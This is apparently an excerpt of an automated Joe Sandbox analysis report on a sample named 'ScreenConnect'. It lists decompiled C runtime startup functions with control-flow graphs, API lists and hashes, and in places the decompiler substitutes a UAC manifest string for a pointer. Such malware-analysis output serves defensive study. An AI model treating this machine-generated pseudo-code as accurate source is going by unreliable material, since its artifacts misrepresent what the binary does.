                                                                            • Part of subcall function 003F239D: __initp_misc_winsig.LIBCMT ref: 003F23BB
                                                                            • Part of subcall function 003F239D: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003F3B13
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003F3B27
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003F3B3A
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003F3B4D
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003F3B60
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003F3B73
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003F3B86
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003F3B99
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003F3BAC
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003F3BBF
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003F3BD2
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003F3BE5
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003F3BF8
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003F3C0B
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003F3C1E
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003F3C31
                                                                          • __mtinitlocks.LIBCMT ref: 003F2FDB
                                                                          • __mtterm.LIBCMT ref: 003F2FE4
                                                                            • Part of subcall function 003F304C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003F2FE9,003F1E82,00402AF0,00000014), ref: 003F4A1C
                                                                            • Part of subcall function 003F304C: DeleteCriticalSection.KERNEL32(X]@,?,?,003F2FE9,003F1E82,00402AF0,00000014), ref: 003F4A45
                                                                          • __calloc_crt.LIBCMT ref: 003F3009
                                                                          • __initptd.LIBCMT ref: 003F302B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 003F3032
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                          • String ID:
                                                                          • API String ID: 1500305132-0
                                                                          • Opcode ID: b48d0e42b039db5ec8026ee65ab4a134afd4ca2d1e26fe1ef094f5238ddc2096
                                                                          • Instruction ID: 7cce189e0b9573931447e6cd8fa5603b9c61c93af6b4446a077616e435d0eb53
                                                                          • Opcode Fuzzy Hash: b48d0e42b039db5ec8026ee65ab4a134afd4ca2d1e26fe1ef094f5238ddc2096
                                                                          • Instruction Fuzzy Hash: A6F0903251971EAAE6377775BC07B7B2A949F01B30B21062BF765DC0D2FF68CA408195
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F5D05, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 193 3f5d05-3f5d10 194 3f5d19-3f5d1b 193->194 195 3f5d12-3f5d17 193->195 197 3f5d1d 194->197 198 3f5d24-3f5d27 call 3f25b3 194->198 196 3f5d1f 195->196 196->198 197->196 200 3f5d2c-3f5d35 198->200 201 3f5d37-3f5d4e call 3f25b3 200->201 202 3f5d55-3f5d57 200->202 201->202 208 3f5d50-3f5d54 201->208 204 3f5d5c-3f5d6b 202->204 206 3f5d6d-3f5d72 204->206 207 3f5d74-3f5d77 204->207 206->204
                                                                          C-Code - Quality: 100%
                                                                          			E003F5D05() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x406f84; // 0x200
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x406f84 = _t3;
				}
				_t4 = E003F25B3(_t3, 4); // executed
				 *0x406f80 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x404a68;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x404ce8) {
							break;
						}
						_t4 =  *0x406f80; // 0x979dc8
					}
					return 0;
				} else {
					 *0x406f84 = _t13;
					_t4 = E003F25B3(_t13, 4);
					 *0x406f80 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}









                                                                          0x003f5d05
                                                                          0x003f5d0d
                                                                          0x003f5d10
                                                                          0x003f5d1b
                                                                          0x003f5d1d
                                                                          0x00000000
                                                                          0x003f5d1d
                                                                          0x003f5d12
                                                                          0x003f5d12
                                                                          0x003f5d1f
                                                                          0x003f5d1f
                                                                          0x003f5d1f
                                                                          0x003f5d27
                                                                          0x003f5d2c
                                                                          0x003f5d35
                                                                          0x003f5d55
                                                                          0x003f5d55
                                                                          0x003f5d57
                                                                          0x003f5d5c
                                                                          0x003f5d5c
                                                                          0x003f5d5f
                                                                          0x003f5d62
                                                                          0x003f5d6b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f5d6d
                                                                          0x003f5d6d
                                                                          0x003f5d77
                                                                          0x003f5d37
                                                                          0x003f5d3a
                                                                          0x003f5d40
                                                                          0x003f5d45
                                                                          0x003f5d4e
                                                                          0x00000000
                                                                          0x003f5d50
                                                                          0x003f5d52
                                                                          0x003f5d54
                                                                          0x003f5d54
                                                                          0x003f5d4e

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: hJ@$L@
                                                                          • API String ID: 3494438863-1775958390
                                                                          • Opcode ID: f9d1ea8d9996456fa02ce4308879fcf182205fc7a91abccda4992ba7f9c685da
                                                                          • Instruction ID: 72396510360b01b77444b7b4dd76f1d8f786ca57dec29c75cb0fe8fc030f2fa7
                                                                          • Opcode Fuzzy Hash: f9d1ea8d9996456fa02ce4308879fcf182205fc7a91abccda4992ba7f9c685da
                                                                          • Instruction Fuzzy Hash: 75F0C27130AA0B9EFB26DB29BE0577527D8F745720F12017BF709EE2A4E77488409798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F10A0, Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 209 3f10a0-3f10f0 VariantInit 210 3f10f7-3f1105 SysAllocString 209->210 211 3f10f2-3f10f5 209->211 213 3f1107-3f110c call 3f1020 210->213 214 3f1111 210->214 212 3f1116-3f1130 211->212 216 3f113a-3f115f SysFreeString VariantClear 212->216 213->214 214->212
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 003F10D7
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F10F8
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F113D
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1147
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID:
                                                                          • API String ID: 760788290-0
                                                                          • Opcode ID: 8fcd694f5bd9a4fee63cd93d588a31b4d4a102192f00ad5c5b568e42feec3533
                                                                          • Instruction ID: 05610f24eccca29ff4a060663569f6004ecfa2ea214cc934024ed029154e0cb7
                                                                          • Opcode Fuzzy Hash: 8fcd694f5bd9a4fee63cd93d588a31b4d4a102192f00ad5c5b568e42feec3533
                                                                          • Instruction Fuzzy Hash: 5C215E72D40658EBCB129BA9DC05BEEBBB8EF49710F104216F940B6350EB754500C690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 003F3069, Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 284 3f3069-3f3096 call 3f2690 call 3f49d1 call 3f25b3 291 3f3098-3f30ae call 3f5770 284->291 292 3f30b3-3f30b8 284->292 300 3f330e-3f3313 call 3f26d5 291->300 293 3f30be-3f30c5 292->293 295 3f30f8-3f3107 GetStartupInfoW 293->295 296 3f30c7-3f30f6 293->296 298 3f310d-3f3112 295->298 299 3f323c-3f323e 295->299 296->293 298->299 301 3f3118-3f312f 298->301 303 3f323f 299->303 304 3f3136-3f3139 301->304 305 3f3131-3f3133 301->305 307 3f3241-3f3247 303->307 308 3f313c-3f3142 304->308 305->304 309 3f324d-3f325e 307->309 310 3f3304-3f330c call 3f3314 307->310 314 3f3164-3f316f 308->314 315 3f3144-3f3155 call 3f25b3 308->315 311 3f3272-3f3278 309->311 312 3f3260-3f3262 309->312 310->300 317 3f327f-3f3286 311->317 318 3f327a-3f327d 311->318 312->311 316 3f3264-3f326d 312->316 321 3f3172-3f3174 314->321 328 3f31ef-3f31f6 315->328 329 3f315b-3f3161 315->329 322 3f32fe-3f32ff 316->322 323 3f3289-3f3296 GetStdHandle 317->323 318->323 321->303 325 3f317a-3f317f 321->325 322->307 326 3f3298-3f329a 323->326 327 3f32e4-3f32f6 323->327 330 3f31dc-3f31ed 325->330 331 3f3181-3f3183 325->331 326->327 334 3f329c-3f32a5 GetFileType 326->334 327->322 333 3f32f8-3f32fb 327->333 335 3f31fc-3f320a 328->335 329->314 330->321 331->330 332 3f3185-3f3189 331->332 332->330 336 3f318b-3f318d 332->336 333->322 334->327 337 3f32a7-3f32b4 334->337 338 3f320c-3f322e 335->338 339 3f3230-3f3237 335->339 340 3f318f-3f319b GetFileType 336->340 341 3f319d-3f31d6 call 3f3a9e 336->341 342 3f32be-3f32c1 337->342 343 3f32b6-3f32bc 337->343 338->335 339->308 340->341 344 3f31d9 340->344 341->344 347 3f32cc-3f32e2 call 3f3a9e 342->347 348 3f32c3-3f32c7 342->348 346 3f32c9 343->346 344->330 346->347 347->322 348->346
                                                                          C-Code - Quality: 85%
                                                                          			E003F3069(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x402bf0);
				E003F2690(__ebx, __edi, __esi);
				E003F49D1(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E003F25B3();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					"\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n" = _t82;
					 *0x407024 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 = "\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n"; // 0x978218
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 = "\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n" + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x406f80; // 0x979dc8
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -4216068
											E003F3A9E(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E003F3314();
						_t86 = 0;
						L49:
						return E003F26D5(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0x407024 < _t135) {
						_t138 = E003F25B3(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t149] = _t138;
							 *0x407024 =  *0x407024 + _t141;
							while(_t138 <  &(("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x407024;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = ("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E003F3A9E(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E003F5770(_t155, 0x404000, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                                                          0x003f3069
                                                                          0x003f306b
                                                                          0x003f3070
                                                                          0x003f3077
                                                                          0x003f307f
                                                                          0x003f3082
                                                                          0x003f3086
                                                                          0x003f3087
                                                                          0x003f3088
                                                                          0x003f308f
                                                                          0x003f3091
                                                                          0x003f3096
                                                                          0x003f30b3
                                                                          0x003f30b8
                                                                          0x003f30be
                                                                          0x003f30c7
                                                                          0x003f30cd
                                                                          0x003f30d0
                                                                          0x003f30d3
                                                                          0x003f30dc
                                                                          0x003f30df
                                                                          0x003f30e5
                                                                          0x003f30e8
                                                                          0x003f30eb
                                                                          0x003f30ee
                                                                          0x003f30f1
                                                                          0x003f30f1
                                                                          0x003f30fc
                                                                          0x003f3107
                                                                          0x003f323c
                                                                          0x003f323e
                                                                          0x003f323f
                                                                          0x003f323f
                                                                          0x003f3241
                                                                          0x003f3241
                                                                          0x003f3247
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f3252
                                                                          0x003f3258
                                                                          0x003f325e
                                                                          0x003f3272
                                                                          0x003f3278
                                                                          0x003f327f
                                                                          0x003f3284
                                                                          0x003f3286
                                                                          0x003f327a
                                                                          0x003f327c
                                                                          0x003f327c
                                                                          0x003f328a
                                                                          0x003f3290
                                                                          0x003f3296
                                                                          0x003f32e4
                                                                          0x003f32ea
                                                                          0x003f32ed
                                                                          0x003f32ef
                                                                          0x003f32f6
                                                                          0x003f32fb
                                                                          0x003f32fb
                                                                          0x00000000
                                                                          0x003f329c
                                                                          0x003f329d
                                                                          0x003f32a5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f32aa
                                                                          0x003f32ac
                                                                          0x003f32b4
                                                                          0x003f32c1
                                                                          0x003f32cc
                                                                          0x003f32d3
                                                                          0x003f32d7
                                                                          0x003f32dc
                                                                          0x003f32df
                                                                          0x00000000
                                                                          0x003f32df
                                                                          0x003f32c7
                                                                          0x003f32c9
                                                                          0x003f32c9
                                                                          0x00000000
                                                                          0x003f32c9
                                                                          0x003f32ba
                                                                          0x00000000
                                                                          0x003f32ba
                                                                          0x003f3264
                                                                          0x003f326a
                                                                          0x003f32fe
                                                                          0x003f32fe
                                                                          0x00000000
                                                                          0x003f32fe
                                                                          0x003f325e
                                                                          0x003f3304
                                                                          0x003f3307
                                                                          0x003f330c
                                                                          0x003f330e
                                                                          0x003f3313
                                                                          0x003f3313
                                                                          0x003f310d
                                                                          0x003f3112
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f3118
                                                                          0x003f311a
                                                                          0x003f311d
                                                                          0x003f3120
                                                                          0x003f3125
                                                                          0x003f312f
                                                                          0x003f3131
                                                                          0x003f3133
                                                                          0x003f3133
                                                                          0x003f3138
                                                                          0x003f3139
                                                                          0x003f313c
                                                                          0x003f314e
                                                                          0x003f3150
                                                                          0x003f3155
                                                                          0x003f31ef
                                                                          0x003f31f6
                                                                          0x003f31fc
                                                                          0x003f320c
                                                                          0x003f3212
                                                                          0x003f3215
                                                                          0x003f3218
                                                                          0x003f321c
                                                                          0x003f3222
                                                                          0x003f3225
                                                                          0x003f3228
                                                                          0x003f322b
                                                                          0x003f322b
                                                                          0x003f3230
                                                                          0x003f3231
                                                                          0x003f3234
                                                                          0x00000000
                                                                          0x003f3234
                                                                          0x003f315b
                                                                          0x003f3161
                                                                          0x00000000
                                                                          0x003f3161
                                                                          0x003f3164
                                                                          0x003f3166
                                                                          0x003f316b
                                                                          0x003f316c
                                                                          0x003f316f
                                                                          0x003f3172
                                                                          0x003f317a
                                                                          0x003f317f
                                                                          0x003f31dc
                                                                          0x003f31dc
                                                                          0x003f31dd
                                                                          0x003f31e3
                                                                          0x003f31e4
                                                                          0x003f31e7
                                                                          0x003f31ea
                                                                          0x00000000
                                                                          0x003f3185
                                                                          0x003f3185
                                                                          0x003f3189
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f318d
                                                                          0x003f319d
                                                                          0x003f31aa
                                                                          0x003f31b1
                                                                          0x003f31b6
                                                                          0x003f31bd
                                                                          0x003f31c7
                                                                          0x003f31cb
                                                                          0x003f31d0
                                                                          0x003f31d3
                                                                          0x003f31d6
                                                                          0x003f31d9
                                                                          0x003f31d9
                                                                          0x00000000
                                                                          0x003f31d9
                                                                          0x003f3190
                                                                          0x003f3196
                                                                          0x003f319b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f319b
                                                                          0x003f317f
                                                                          0x00000000
                                                                          0x003f3172
                                                                          0x003f30ab
                                                                          0x00000000

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 003F3077
                                                                            • Part of subcall function 003F49D1: __mtinitlocknum.LIBCMT ref: 003F49E3
                                                                            • Part of subcall function 003F49D1: EnterCriticalSection.KERNEL32(00000000,?,003F2F6C,0000000D), ref: 003F49FC
                                                                          • __calloc_crt.LIBCMT ref: 003F3088
                                                                            • Part of subcall function 003F25B3: __calloc_impl.LIBCMT ref: 003F25C2
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 003F30A3
                                                                          • GetStartupInfoW.KERNEL32(?,00402BF0,00000064,003F1E9C,00402AF0,00000014), ref: 003F30FC
                                                                          • __calloc_crt.LIBCMT ref: 003F3147
                                                                          • GetFileType.KERNEL32(00000001), ref: 003F3190
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 2772871689-0
                                                                          • Opcode ID: d034845fbbe69de6bc325e7480d7241f64ca999058d83b3b1b08929f79767040
                                                                          • Instruction ID: ee5fb58d836309d2a3e9586b246bc430052fdcf1b5eb0feea96e571d91fc31c5
                                                                          • Opcode Fuzzy Hash: d034845fbbe69de6bc325e7480d7241f64ca999058d83b3b1b08929f79767040
                                                                          • Instruction Fuzzy Hash: BB810671D043499FCB12CFA8C8416B9BBF0AF09324B24466ED6A6AB3D1D734DA42CB14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F1B16, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 352 3f1b16-3f1b1a 353 3f216e-3f2174 352->353 354 3f2183-3f218e call 3f477c 353->354 357 3f2176-3f2181 call 3f493b 354->357 358 3f2190-3f2193 354->358 357->354 361 3f2194-3f21d4 call 3f4833 call 3f496e call 3f4871 357->361 368 3f21dd-3f21e1 361->368 369 3f21d6-3f21dc call 3f1b02 361->369 369->368
                                                                          C-Code - Quality: 82%
                                                                          			E003F1B16(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _v0;
				char* _v20;
				signed char _v32;
				void* _t10;
				void* _t19;
				signed char* _t22;
				void* _t24;
				void* _t25;
				signed char* _t27;
				void* _t30;
				void* _t32;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				_pop(_t29);
				_t30 = _t32;
				while(1) {
					_t10 = E003F477C(_t19, _t24, _t25, _v0);
					if(_t10 != 0) {
						break;
					}
					if(E003F493B(_t10, _v0) == 0) {
						_push(1);
						_v20 = "bad allocation";
						_t22 =  &_v32;
						E003F4833(_t22,  &_v20);
						_v32 = 0x3fe2a0;
						E003F496E( &_v32, 0x402b0c);
						asm("int3");
						_push(_t30);
						_t27 = _t22;
						 *_t27 = 0x3fe2a0;
						E003F4871(_t22);
						if((_v32 & 0x00000001) != 0) {
							E003F1B02(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L8:
				}
				return _t10;
				goto L8;
			}














                                                                          0x003f1b16
                                                                          0x003f1b16
                                                                          0x003f1b16
                                                                          0x003f1b19
                                                                          0x003f216f
                                                                          0x003f2183
                                                                          0x003f2186
                                                                          0x003f218e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f2181
                                                                          0x003f2194
                                                                          0x003f2199
                                                                          0x003f21a1
                                                                          0x003f21a4
                                                                          0x003f21b1
                                                                          0x003f21b9
                                                                          0x003f21be
                                                                          0x003f21bf
                                                                          0x003f21c3
                                                                          0x003f21c5
                                                                          0x003f21cb
                                                                          0x003f21d4
                                                                          0x003f21d7
